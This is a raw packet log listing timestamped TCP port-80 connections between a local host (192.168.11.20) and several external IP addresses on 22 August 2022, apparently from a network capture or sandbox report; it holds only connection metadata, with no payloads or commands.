                                                                                                              Aug 22, 2022 20:04:09.948301077 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:09.948502064 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.114213943 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.114262104 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.114294052 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.114324093 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.114353895 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.114383936 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.114413977 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.114424944 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.114445925 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.114487886 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.114511967 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.114543915 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.114548922 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.114737034 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.280122042 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280162096 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280173063 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280186892 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280196905 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280205965 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280215979 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280225039 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280339003 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.280365944 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.280433893 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.280459881 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280472040 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280529976 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280540943 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280611038 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.280683994 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280694962 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280704975 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.280819893 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.280962944 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.281172991 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.281316996 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.446501970 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.446593046 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.446666002 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.446701050 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.446739912 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.446794033 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.446799994 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.446835041 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.446871042 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.446897984 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.446907043 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.446943045 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.446964979 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.446980000 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.447186947 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.447314024 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.612986088 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613121986 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613164902 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613204956 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613245964 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613313913 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.613353014 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613424063 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613431931 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.613467932 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613508940 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613548040 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613586903 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613630056 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613677025 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.613697052 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613739014 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613810062 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613851070 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613858938 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.613912106 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613955975 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.613985062 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.613996983 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.614037991 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.614204884 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.614240885 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.614408970 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.614536047 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.614679098 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.614761114 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.614871025 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.615114927 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.615159035 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.615295887 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.615415096 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.615592003 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.780092001 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.780155897 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.780200958 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.780241966 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.780307055 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.781117916 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.781183958 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.781534910 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.781632900 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.781678915 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.781718969 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.782360077 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.782424927 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.782769918 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.782835960 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.782903910 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.783030987 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.783399105 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.783459902 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.783824921 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.783885956 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.783960104 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.784002066 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.784041882 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.784081936 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.799859047 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.799923897 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:10.800215960 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:10.800313950 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:28.104423046 CEST4978480192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:28.115264893 CEST804978434.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:28.115520954 CEST4978480192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:28.115617037 CEST4978480192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:28.126375914 CEST804978434.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:28.225886106 CEST804978434.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:28.225938082 CEST804978434.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:28.226284981 CEST4978480192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:28.226335049 CEST4978480192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:28.235187054 CEST804978434.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.236948013 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.247659922 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.247855902 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.249640942 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.249722004 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.258856058 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.258905888 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.259088039 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.259094000 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.259157896 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.259164095 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.259198904 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.259217024 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.259232044 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.259438992 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.259609938 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.260394096 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.260431051 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.260462999 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.260629892 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.267973900 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268048048 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268081903 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268160105 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.268203020 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268302917 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268307924 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.268393040 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268430948 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268461943 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268511057 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.268625975 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268659115 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268690109 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268721104 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.268735886 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.268897057 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.268961906 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.269045115 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.269088030 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.269124985 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.269176006 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.269207954 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.269330978 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.269341946 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.269447088 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.269510031 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.269556999 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.269685984 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.269864082 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.277235985 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.277400970 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.277482033 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.277512074 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.277546883 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.277662992 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.277757883 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.277841091 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.277928114 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.278017998 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.278167009 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.278192043 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.278296947 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.278328896 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.278384924 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.278415918 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.278585911 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.278587103 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.278644085 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.278673887 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.278697014 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.278722048 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.278879881 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.279037952 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279053926 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.279208899 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279242039 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279272079 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279303074 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279315948 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.279387951 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279448032 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279465914 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.279505014 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279536009 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279578924 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279623985 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279632092 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.279654980 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279685974 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279695034 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.279767036 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279798031 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279848099 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279879093 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279887915 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.279910088 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279942989 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.279994965 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.280025959 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.280097008 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.280147076 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.280267000 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.280282021 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.280298948 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.280411959 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.280558109 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.280626059 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.280807972 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.286289930 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.286339045 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.286374092 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.286541939 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.286575079 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.286636114 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.286650896 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.286689043 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.286819935 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.286880970 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.287040949 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.287061930 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.287225008 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.287378073 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.287426949 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.287571907 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.287621975 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.290155888 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.290347099 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.290417910 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.290483952 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.290640116 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.293114901 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.299243927 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.304990053 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.358568907 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.358619928 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.358653069 CEST804978534.102.136.180192.168.11.20
                                                                                                              Aug 22, 2022 20:04:30.358788013 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:04:30.358834982 CEST4978580192.168.11.2034.102.136.180
                                                                                                              Aug 22, 2022 20:05:11.212157011 CEST4978680192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:12.226886034 CEST4978680192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:14.242382050 CEST4978680192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:18.256839037 CEST4978680192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:26.270651102 CEST4978680192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:34.301542044 CEST4978780192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:34.740957022 CEST4978880192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:35.315651894 CEST4978780192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:35.752856016 CEST4978880192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:37.330728054 CEST4978780192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:37.770355940 CEST4978880192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:41.345407963 CEST4978780192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:41.782843113 CEST4978880192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:49.359366894 CEST4978780192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:05:49.796849966 CEST4978880192.168.11.20154.201.220.155
                                                                                                              Aug 22, 2022 20:06:14.260962009 CEST4979080192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:14.519141912 CEST804979045.117.11.104192.168.11.20
                                                                                                              Aug 22, 2022 20:06:14.519388914 CEST4979080192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:14.519458055 CEST4979080192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:14.759479046 CEST804979045.117.11.104192.168.11.20
                                                                                                              Aug 22, 2022 20:06:14.759552956 CEST804979045.117.11.104192.168.11.20
                                                                                                              Aug 22, 2022 20:06:14.759603977 CEST804979045.117.11.104192.168.11.20
                                                                                                              Aug 22, 2022 20:06:14.759646893 CEST804979045.117.11.104192.168.11.20
                                                                                                              Aug 22, 2022 20:06:14.759763002 CEST4979080192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:14.759836912 CEST4979080192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:14.759852886 CEST4979080192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:15.416038036 CEST4979080192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:16.712584019 CEST4979080192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:16.776134968 CEST4979180192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:16.988126040 CEST804979145.117.11.104192.168.11.20
                                                                                                              Aug 22, 2022 20:06:16.988480091 CEST4979180192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:16.990226984 CEST4979180192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:17.204526901 CEST804979145.117.11.104192.168.11.20
                                                                                                              Aug 22, 2022 20:06:17.204607010 CEST804979145.117.11.104192.168.11.20
                                                                                                              Aug 22, 2022 20:06:17.204649925 CEST804979145.117.11.104192.168.11.20
                                                                                                              Aug 22, 2022 20:06:17.204687119 CEST804979145.117.11.104192.168.11.20
                                                                                                              Aug 22, 2022 20:06:17.204694986 CEST4979180192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:17.204858065 CEST4979180192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:17.204876900 CEST4979180192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:19.305803061 CEST4979080192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:24.476721048 CEST4979080192.168.11.2045.117.11.104
                                                                                                              Aug 22, 2022 20:06:24.760576963 CEST804979045.117.11.104192.168.11.20
                                                                                                              Aug 22, 2022 20:06:33.126305103 CEST4979280192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:33.309470892 CEST804979235.155.7.183192.168.11.20
